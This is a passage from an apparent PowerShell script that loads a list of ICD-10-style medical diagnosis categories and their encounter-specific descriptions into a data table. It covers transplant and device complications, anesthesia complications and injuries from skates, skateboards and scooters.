$DiagnosisList.Rows.Add("Infection and inflammatory reaction due to implanted electronic neurostimulator of spinal cord, electrode (lead)","Infection and inflammatory reaction due to implanted electronic neurostimulator of spinal cord, electrode (lead), sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to implanted electronic neurostimulator, generator","Infection and inflammatory reaction due to implanted electronic neurostimulator, generator, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to implanted electronic neurostimulator, generator","Infection and inflammatory reaction due to implanted electronic neurostimulator, generator, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to implanted electronic neurostimulator, generator","Infection and inflammatory reaction due to implanted electronic neurostimulator, generator, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to cranial or spinal infusion catheter","Infection and inflammatory reaction due to cranial or spinal infusion catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to cranial or spinal infusion catheter","Infection and inflammatory reaction due to cranial or spinal infusion catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to cranial or spinal infusion catheter","Infection and inflammatory reaction due to cranial or spinal infusion catheter, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to other nervous system device, implant or graft","Infection and inflammatory reaction due to other nervous system device, implant or graft, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to other nervous system device, implant or graft","Infection and inflammatory reaction due to other nervous system device, implant or graft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to other nervous system device, implant or graft","Infection and inflammatory reaction due to other nervous system device, implant or graft, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to other internal prosthetic devices, implants and grafts","Infection and inflammatory reaction due to other internal prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to other internal prosthetic devices, implants and grafts","Infection and inflammatory reaction due to other internal prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to other internal prosthetic devices, implants and grafts","Infection and inflammatory reaction due to other internal prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Embolism due to nervous system prosthetic devices, implants and grafts","Embolism due to nervous system prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Embolism due to nervous system prosthetic devices, implants and grafts","Embolism due to nervous system prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Embolism due to nervous system prosthetic devices, implants and grafts","Embolism due to nervous system prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Embolism due to other internal prosthetic devices, implants and grafts","Embolism due to other internal prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Embolism due to other internal prosthetic devices, implants and grafts","Embolism due to other internal prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Embolism due to other internal prosthetic devices, implants and grafts","Embolism due to other internal prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Fibrosis due to nervous system prosthetic devices, implants and grafts","Fibrosis due to nervous system prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Fibrosis due to nervous system prosthetic devices, implants and grafts","Fibrosis due to nervous system prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fibrosis due to nervous system prosthetic devices, implants and grafts","Fibrosis due to nervous system prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Fibrosis due to other internal prosthetic devices, implants and grafts","Fibrosis due to other internal prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Fibrosis due to other internal prosthetic devices, implants and grafts","Fibrosis due to other internal prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fibrosis due to other internal prosthetic devices, implants and grafts","Fibrosis due to other internal prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Hemorrhage due to nervous system prosthetic devices, implants and grafts","Hemorrhage due to nervous system prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Hemorrhage due to nervous system prosthetic devices, implants and grafts","Hemorrhage due to nervous system prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Hemorrhage due to nervous system prosthetic devices, implants and grafts","Hemorrhage due to nervous system prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Hemorrhage due to other internal prosthetic devices, implants and grafts","Hemorrhage due to other internal prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Hemorrhage due to other internal prosthetic devices, implants and grafts","Hemorrhage due to other internal prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Hemorrhage due to other internal prosthetic devices, implants and grafts","Hemorrhage due to other internal prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Pain due to nervous system prosthetic devices, implants and grafts","Pain due to nervous system prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Pain due to nervous system prosthetic devices, implants and grafts","Pain due to nervous system prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pain due to nervous system prosthetic devices, implants and grafts","Pain due to nervous system prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Pain due to other internal prosthetic devices, implants and grafts","Pain due to other internal prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Pain due to other internal prosthetic devices, implants and grafts","Pain due to other internal prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pain due to other internal prosthetic devices, implants and grafts","Pain due to other internal prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Stenosis due to nervous system prosthetic devices, implants and grafts","Stenosis due to nervous system prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Stenosis due to nervous system prosthetic devices, implants and grafts","Stenosis due to nervous system prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Stenosis due to nervous system prosthetic devices, implants and grafts","Stenosis due to nervous system prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Stenosis due to other internal prosthetic devices, implants and grafts","Stenosis due to other internal prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Stenosis due to other internal prosthetic devices, implants and grafts","Stenosis due to other internal prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Stenosis due to other internal prosthetic devices, implants and grafts","Stenosis due to other internal prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Thrombosis due to nervous system prosthetic devices, implants and grafts","Thrombosis due to nervous system prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Thrombosis due to nervous system prosthetic devices, implants and grafts","Thrombosis due to nervous system prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Thrombosis due to nervous system prosthetic devices, implants and grafts","Thrombosis due to nervous system prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Thrombosis due to other internal prosthetic devices, implants and grafts","Thrombosis due to other internal prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Thrombosis due to other internal prosthetic devices, implants and grafts","Thrombosis due to other internal prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Thrombosis due to other internal prosthetic devices, implants and grafts","Thrombosis due to other internal prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Other specified complication of nervous system prosthetic devices, implants and grafts","Other specified complication of nervous system prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified complication of nervous system prosthetic devices, implants and grafts","Other specified complication of nervous system prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified complication of nervous system prosthetic devices, implants and grafts","Other specified complication of nervous system prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Other specified complication of other internal prosthetic devices, implants and grafts","Other specified complication of other internal prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified complication of other internal prosthetic devices, implants and grafts","Other specified complication of other internal prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified complication of other internal prosthetic devices, implants and grafts","Other specified complication of other internal prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified complication of internal prosthetic device, implant and graft","Unspecified complication of internal prosthetic device, implant and graft, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified complication of internal prosthetic device, implant and graft","Unspecified complication of internal prosthetic device, implant and graft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified complication of internal prosthetic device, implant and graft","Unspecified complication of internal prosthetic device, implant and graft, sequela") + $null = $DiagnosisList.Rows.Add("Complications of bone marrow transplant","Unspecified complication of bone marrow transplant") + $null = $DiagnosisList.Rows.Add("Complications of bone marrow transplant","Bone marrow transplant rejection") + $null = $DiagnosisList.Rows.Add("Complications of bone marrow transplant","Bone marrow transplant failure") + $null = $DiagnosisList.Rows.Add("Complications of bone marrow transplant","Bone marrow transplant infection") + $null = $DiagnosisList.Rows.Add("Complications of bone marrow transplant","Other complications of bone marrow transplant") + $null = $DiagnosisList.Rows.Add("Complications of kidney transplant","Unspecified complication of kidney transplant") + $null = $DiagnosisList.Rows.Add("Complications of kidney transplant","Kidney transplant rejection") + $null = $DiagnosisList.Rows.Add("Complications of kidney transplant","Kidney transplant failure") + $null = $DiagnosisList.Rows.Add("Complications of kidney transplant","Kidney transplant infection") + $null = $DiagnosisList.Rows.Add("Complications of kidney transplant","Other complication of kidney transplant") + $null = $DiagnosisList.Rows.Add("Complications of heart transplant","Unspecified complication of heart transplant") + $null = $DiagnosisList.Rows.Add("Complications of heart transplant","Heart transplant rejection") + $null = $DiagnosisList.Rows.Add("Complications of heart transplant","Heart transplant failure") + $null = $DiagnosisList.Rows.Add("Complications of heart transplant","Heart transplant infection") + $null = $DiagnosisList.Rows.Add("Other complications of heart transplant","Cardiac allograft vasculopathy") + $null = $DiagnosisList.Rows.Add("Other complications of heart transplant","Other complications of heart transplant") + $null = $DiagnosisList.Rows.Add("Complications of heart-lung transplant","Unspecified complication of heart-lung transplant") + $null = $DiagnosisList.Rows.Add("Complications of heart-lung transplant","Heart-lung transplant rejection") + $null = $DiagnosisList.Rows.Add("Complications of heart-lung transplant","Heart-lung transplant failure") + $null = $DiagnosisList.Rows.Add("Complications of heart-lung transplant","Heart-lung transplant infection") + $null = $DiagnosisList.Rows.Add("Complications of heart-lung transplant","Other complications of heart-lung transplant") + $null = $DiagnosisList.Rows.Add("Complications of liver transplant","Unspecified complication of liver transplant") + $null = $DiagnosisList.Rows.Add("Complications of liver transplant","Liver transplant rejection") + $null = $DiagnosisList.Rows.Add("Complications of liver transplant","Liver transplant failure") + $null = $DiagnosisList.Rows.Add("Complications of liver transplant","Liver transplant infection") + $null = $DiagnosisList.Rows.Add("Complications of liver transplant","Other complications of liver transplant") + $null = $DiagnosisList.Rows.Add("Complications of stem cell transplant","Complications of stem cell transplant") + $null = $DiagnosisList.Rows.Add("Complications of lung transplant","Lung transplant rejection") + $null = $DiagnosisList.Rows.Add("Complications of lung transplant","Lung transplant failure") + $null = $DiagnosisList.Rows.Add("Complications of lung transplant","Lung transplant infection") + $null = $DiagnosisList.Rows.Add("Complications of lung transplant","Other complications of lung transplant") + $null = $DiagnosisList.Rows.Add("Complications of lung transplant","Unspecified complication of lung transplant") + $null = $DiagnosisList.Rows.Add("Complications of skin graft (allograft) (autograft)","Skin graft (allograft) rejection") + $null = $DiagnosisList.Rows.Add("Complications of skin graft (allograft) (autograft)","Skin graft (allograft) (autograft) failure") + $null = $DiagnosisList.Rows.Add("Complications of skin graft (allograft) (autograft)","Skin graft (allograft) (autograft) infection") + $null = $DiagnosisList.Rows.Add("Complications of skin graft (allograft) (autograft)","Other complications of skin graft (allograft) (autograft)") + $null = $DiagnosisList.Rows.Add("Complications of skin graft (allograft) (autograft)","Unspecified complication of skin graft (allograft) (autograft)") + $null = $DiagnosisList.Rows.Add("Complications of bone graft","Bone graft rejection") + $null = $DiagnosisList.Rows.Add("Complications of bone graft","Bone graft failure") + $null = $DiagnosisList.Rows.Add("Complications of bone graft","Bone graft infection") + $null = $DiagnosisList.Rows.Add("Complications of bone graft","Other complications of bone graft") + $null = $DiagnosisList.Rows.Add("Complications of bone graft","Unspecified complication of bone graft") + $null = $DiagnosisList.Rows.Add("Complications of corneal transplant","Corneal transplant rejection") + $null = $DiagnosisList.Rows.Add("Complications of corneal transplant","Corneal transplant failure") + $null = $DiagnosisList.Rows.Add("Complications of corneal transplant","Corneal transplant infection") + $null = $DiagnosisList.Rows.Add("Complications of corneal transplant","Other complications of corneal transplant") + $null = $DiagnosisList.Rows.Add("Complications of corneal transplant","Unspecified complication of corneal transplant") + $null = $DiagnosisList.Rows.Add("Complication of intestine transplant","Intestine transplant rejection") + $null = $DiagnosisList.Rows.Add("Complication of intestine transplant","Intestine transplant failure") + $null = $DiagnosisList.Rows.Add("Complication of intestine transplant","Intestine transplant infection") + $null = $DiagnosisList.Rows.Add("Complication of intestine transplant","Other complications of intestine transplant") + $null = $DiagnosisList.Rows.Add("Complication of intestine transplant","Unspecified complication of intestine transplant") + $null = $DiagnosisList.Rows.Add("Complications of other transplanted tissue","Other transplanted tissue rejection") + $null = $DiagnosisList.Rows.Add("Complications of other transplanted tissue","Other transplanted tissue failure") + $null = $DiagnosisList.Rows.Add("Complications of other transplanted tissue","Other transplanted tissue infection") + $null = $DiagnosisList.Rows.Add("Complications of other transplanted tissue","Other complications of other transplanted tissue") + $null = $DiagnosisList.Rows.Add("Complications of other transplanted tissue","Unspecified complication of other transplanted tissue") + $null = $DiagnosisList.Rows.Add("Complication of unspecified transplanted organ and tissue","Unspecified complication of unspecified transplanted organ and tissue") + $null = $DiagnosisList.Rows.Add("Complication of unspecified transplanted organ and tissue","Unspecified transplanted organ and tissue rejection") + $null = $DiagnosisList.Rows.Add("Complication of unspecified transplanted organ and tissue","Unspecified transplanted organ and tissue failure") + $null = $DiagnosisList.Rows.Add("Complication of unspecified transplanted organ and tissue","Unspecified transplanted organ and tissue infection") + $null = $DiagnosisList.Rows.Add("Complication of unspecified transplanted organ and tissue","Other complications of unspecified transplanted organ and tissue") + $null = $DiagnosisList.Rows.Add("Complications of reattached (part of) upper extremity","Complications of reattached (part of) right upper extremity") + $null = $DiagnosisList.Rows.Add("Complications of reattached (part of) upper extremity","Complications of reattached (part of) left upper extremity") + $null = $DiagnosisList.Rows.Add("Complications of reattached (part of) upper extremity","Complications of reattached (part of) unspecified upper extremity") + $null = $DiagnosisList.Rows.Add("Complications of reattached (part of) lower extremity","Complications of reattached (part of) right lower extremity") + $null = $DiagnosisList.Rows.Add("Complications of reattached (part of) lower extremity","Complications of reattached (part of) left lower extremity") + $null = $DiagnosisList.Rows.Add("Complications of reattached (part of) lower extremity","Complications of reattached (part of) unspecified lower extremity") + $null = $DiagnosisList.Rows.Add("Complications of other reattached body part","Complications of other reattached body part") + $null = $DiagnosisList.Rows.Add("Neuroma of amputation stump","Neuroma of amputation stump, unspecified extremity") + $null = $DiagnosisList.Rows.Add("Neuroma of amputation stump","Neuroma of amputation stump, right upper extremity") + $null = $DiagnosisList.Rows.Add("Neuroma of amputation stump","Neuroma of amputation stump, left upper extremity") + $null = $DiagnosisList.Rows.Add("Neuroma of amputation stump","Neuroma of amputation stump, right lower extremity") + $null = $DiagnosisList.Rows.Add("Neuroma of amputation stump","Neuroma of amputation stump, left lower extremity") + $null = $DiagnosisList.Rows.Add("Infection of amputation stump","Infection of amputation stump, unspecified extremity") + $null = $DiagnosisList.Rows.Add("Infection of amputation stump","Infection of amputation stump, right upper extremity") + $null = $DiagnosisList.Rows.Add("Infection of amputation stump","Infection of amputation stump, left upper extremity") + $null = $DiagnosisList.Rows.Add("Infection of amputation stump","Infection of amputation stump, right lower extremity") + $null = $DiagnosisList.Rows.Add("Infection of amputation stump","Infection of amputation stump, left lower extremity") + $null = $DiagnosisList.Rows.Add("Necrosis of amputation stump","Necrosis of amputation stump, unspecified extremity") + $null = $DiagnosisList.Rows.Add("Necrosis of amputation stump","Necrosis of amputation stump, right upper extremity") + $null = $DiagnosisList.Rows.Add("Necrosis of amputation stump","Necrosis of amputation stump, left upper extremity") + $null = $DiagnosisList.Rows.Add("Necrosis of amputation stump","Necrosis of amputation stump, right lower extremity") + $null = $DiagnosisList.Rows.Add("Necrosis of amputation stump","Necrosis of amputation stump, left lower extremity") + $null = $DiagnosisList.Rows.Add("Other complications of amputation stump","Dehiscence of amputation stump") + $null = $DiagnosisList.Rows.Add("Other complications of amputation stump","Other complications of amputation stump") + $null = $DiagnosisList.Rows.Add("Unspecified complications of amputation stump","Unspecified complications of amputation stump") + $null = $DiagnosisList.Rows.Add("Infection following immunization","Infection following immunization, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection following immunization","Infection following immunization, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection following immunization","Infection following immunization, sequela") + $null = $DiagnosisList.Rows.Add("Other complications following immunization, not elsewhere classified","Other complications following immunization, not elsewhere classified, initial encounter") + $null = $DiagnosisList.Rows.Add("Other complications following immunization, not elsewhere classified","Other complications following immunization, not elsewhere classified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other complications following immunization, not elsewhere classified","Other complications following immunization, not elsewhere classified, sequela") + $null = $DiagnosisList.Rows.Add("Shock due to anesthesia","Shock due to anesthesia, initial encounter") + $null = $DiagnosisList.Rows.Add("Shock due to anesthesia","Shock due to anesthesia, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Shock due to anesthesia","Shock due to anesthesia, sequela") + $null = $DiagnosisList.Rows.Add("Malignant hyperthermia due to anesthesia","Malignant hyperthermia due to anesthesia, initial encounter") + $null = $DiagnosisList.Rows.Add("Malignant hyperthermia due to anesthesia","Malignant hyperthermia due to anesthesia, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Malignant hyperthermia due to anesthesia","Malignant hyperthermia due to anesthesia, sequela") + $null = $DiagnosisList.Rows.Add("Failed or difficult intubation","Failed or difficult intubation, initial encounter") + $null = $DiagnosisList.Rows.Add("Failed or difficult intubation","Failed or difficult intubation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Failed or difficult intubation","Failed or difficult intubation, sequela") + $null = $DiagnosisList.Rows.Add("Hypothermia following anesthesia","Hypothermia following anesthesia, initial encounter") + $null = $DiagnosisList.Rows.Add("Hypothermia following anesthesia","Hypothermia following anesthesia, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Hypothermia following anesthesia","Hypothermia following anesthesia, sequela") + $null = $DiagnosisList.Rows.Add("Failed moderate sedation during procedure","Failed moderate sedation during procedure, initial encounter") + $null = $DiagnosisList.Rows.Add("Failed moderate sedation during procedure","Failed moderate sedation during procedure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Failed moderate sedation during procedure","Failed moderate sedation during procedure, sequela") + $null = $DiagnosisList.Rows.Add("Unintended awareness under general anesthesia during procedure","Unintended awareness under general anesthesia during procedure, initial encounter") + $null = $DiagnosisList.Rows.Add("Unintended awareness under general anesthesia during procedure","Unintended awareness under general anesthesia during procedure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unintended awareness under general anesthesia during procedure","Unintended awareness under general anesthesia during procedure, sequela") + $null = $DiagnosisList.Rows.Add("Other complications of anesthesia","Other complications of anesthesia, initial encounter") + $null = $DiagnosisList.Rows.Add("Other complications of anesthesia","Other complications of anesthesia, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other complications of anesthesia","Other complications of anesthesia, sequela") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to adverse effect of correct drug or medicament properly administered","Anaphylactic reaction due to adverse effect of correct drug or medicament properly administered, initial encounter") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to adverse effect of correct drug or medicament properly administered","Anaphylactic reaction due to adverse effect of correct drug or medicament properly administered, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to adverse effect of correct drug or medicament properly administered","Anaphylactic reaction due to adverse effect of correct drug or medicament properly administered, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified adverse effect of drug or medicament","Unspecified adverse effect of drug or medicament, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified adverse effect of drug or medicament","Unspecified adverse effect of drug or medicament, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified adverse effect of drug or medicament","Unspecified adverse effect of drug or medicament, sequela") + $null = $DiagnosisList.Rows.Add("Other specified complications of surgical and medical care, not elsewhere classified","Other specified complications of surgical and medical care, not elsewhere classified, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified complications of surgical and medical care, not elsewhere classified","Other specified complications of surgical and medical care, not elsewhere classified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified complications of surgical and medical care, not elsewhere classified","Other specified complications of surgical and medical care, not elsewhere classified, sequela") + $null = $DiagnosisList.Rows.Add("Complication of surgical and medical care, unspecified","Complication of surgical and medical care, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Complication of surgical and medical care, unspecified","Complication of surgical and medical care, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complication of surgical and medical care, unspecified","Complication of surgical and medical care, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with roller-skater","Pedestrian on foot injured in collision with roller-skater, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with roller-skater","Pedestrian on foot injured in collision with roller-skater, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with roller-skater","Pedestrian on foot injured in collision with roller-skater, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with skateboarder","Pedestrian on foot injured in collision with skateboarder, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with skateboarder","Pedestrian on foot injured in collision with skateboarder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with skateboarder","Pedestrian on foot injured in collision with skateboarder, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with other pedestrian conveyance","Pedestrian on foot injured in collision with other pedestrian conveyance, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with other pedestrian conveyance","Pedestrian on foot injured in collision with other pedestrian conveyance, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with other pedestrian conveyance","Pedestrian on foot injured in collision with other pedestrian conveyance, sequela") + $null = $DiagnosisList.Rows.Add("Fall from in-line roller-skates","Fall from in-line roller-skates, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from in-line roller-skates","Fall from in-line roller-skates, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from in-line roller-skates","Fall from in-line roller-skates, sequela") + $null = $DiagnosisList.Rows.Add("In-line roller-skater colliding with stationary object","In-line roller-skater colliding with stationary object, initial encounter") + $null = $DiagnosisList.Rows.Add("In-line roller-skater colliding with stationary object","In-line roller-skater colliding with stationary object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("In-line roller-skater colliding with stationary object","In-line roller-skater colliding with stationary object, sequela") + $null = $DiagnosisList.Rows.Add("Other in-line roller-skate accident","Other in-line roller-skate accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Other in-line roller-skate accident","Other in-line roller-skate accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other in-line roller-skate accident","Other in-line roller-skate accident, sequela") + $null = $DiagnosisList.Rows.Add("Fall from non-in-line roller-skates","Fall from non-in-line roller-skates, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from non-in-line roller-skates","Fall from non-in-line roller-skates, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from non-in-line roller-skates","Fall from non-in-line roller-skates, sequela") + $null = $DiagnosisList.Rows.Add("Non-in-line roller-skater colliding with stationary object","Non-in-line roller-skater colliding with stationary object, initial encounter") + $null = $DiagnosisList.Rows.Add("Non-in-line roller-skater colliding with stationary object","Non-in-line roller-skater colliding with stationary object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Non-in-line roller-skater colliding with stationary object","Non-in-line roller-skater colliding with stationary object, sequela") + $null = $DiagnosisList.Rows.Add("Other non-in-line roller-skating accident","Other non-in-line roller-skating accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Other non-in-line roller-skating accident","Other non-in-line roller-skating accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other non-in-line roller-skating accident","Other non-in-line roller-skating accident, sequela") + $null = $DiagnosisList.Rows.Add("Fall from skateboard","Fall from skateboard, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from skateboard","Fall from skateboard, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from skateboard","Fall from skateboard, sequela") + $null = $DiagnosisList.Rows.Add("Skateboarder colliding with stationary object","Skateboarder colliding with stationary object, initial encounter") + $null = $DiagnosisList.Rows.Add("Skateboarder colliding with stationary object","Skateboarder colliding with stationary object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Skateboarder colliding with stationary object","Skateboarder colliding with stationary object, sequela") + $null = $DiagnosisList.Rows.Add("Other skateboard accident","Other skateboard accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Other skateboard accident","Other skateboard accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other skateboard accident","Other skateboard accident, sequela") + $null = $DiagnosisList.Rows.Add("Fall from scooter (nonmotorized)","Fall from scooter (nonmotorized), initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from scooter (nonmotorized)","Fall from scooter (nonmotorized), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from scooter (nonmotorized)","Fall from scooter (nonmotorized), sequela") + $null = $DiagnosisList.Rows.Add("Scooter (nonmotorized) colliding with stationary object","Scooter (nonmotorized) colliding with stationary object, initial encounter") + $null = $DiagnosisList.Rows.Add("Scooter (nonmotorized) colliding with stationary object","Scooter (nonmotorized) colliding with stationary object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Scooter (nonmotorized) colliding with stationary object","Scooter (nonmotorized) colliding with stationary object, sequela") + $null = $DiagnosisList.Rows.Add("Other scooter (nonmotorized) accident","Other scooter (nonmotorized) accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Other scooter (nonmotorized) accident","Other scooter (nonmotorized) accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other scooter (nonmotorized) accident","Other scooter (nonmotorized) accident, sequela") + $null = $DiagnosisList.Rows.Add("Fall from heelies","Fall from heelies, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from heelies","Fall from heelies, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from heelies","Fall from heelies, sequela") + $null = $DiagnosisList.Rows.Add("Heelies colliding with stationary object","Heelies colliding with stationary object, initial encounter") + $null = $DiagnosisList.Rows.Add("Heelies colliding with stationary object","Heelies colliding with stationary object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Heelies colliding with stationary object","Heelies colliding with stationary object, sequela") + $null = $DiagnosisList.Rows.Add("Other heelies accident","Other heelies accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Other heelies accident","Other heelies accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other heelies accident","Other heelies accident, sequela") + $null = $DiagnosisList.Rows.Add("Fall from other rolling-type pedestrian conveyance","Fall from other rolling-type pedestrian conveyance, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from other rolling-type pedestrian conveyance","Fall from other rolling-type pedestrian conveyance, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from other rolling-type pedestrian conveyance","Fall from other rolling-type pedestrian conveyance, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on other rolling-type pedestrian conveyance colliding with stationary object","Pedestrian on other rolling-type pedestrian conveyance colliding with stationary object, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on other rolling-type pedestrian conveyance colliding with stationary object","Pedestrian on other rolling-type pedestrian conveyance colliding with stationary object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on other rolling-type pedestrian conveyance colliding with stationary object","Pedestrian on other rolling-type pedestrian conveyance colliding with stationary object, sequela") + $null = $DiagnosisList.Rows.Add("Other accident on other rolling-type pedestrian conveyance","Other accident on other rolling-type pedestrian conveyance, initial encounter") + $null = $DiagnosisList.Rows.Add("Other accident on other rolling-type pedestrian conveyance","Other accident on other rolling-type pedestrian conveyance, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other accident on other rolling-type pedestrian conveyance","Other accident on other rolling-type pedestrian conveyance, sequela") + $null = $DiagnosisList.Rows.Add("Fall from ice-skates","Fall from ice-skates, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from ice-skates","Fall from ice-skates, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from ice-skates","Fall from ice-skates, sequela") + $null = $DiagnosisList.Rows.Add("Ice-skater colliding with stationary object","Ice-skater colliding with stationary object, initial encounter") + $null = $DiagnosisList.Rows.Add("Ice-skater colliding with stationary object","Ice-skater colliding with stationary object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Ice-skater colliding with stationary object","Ice-skater colliding with stationary object, sequela") + $null = $DiagnosisList.Rows.Add("Other ice-skates 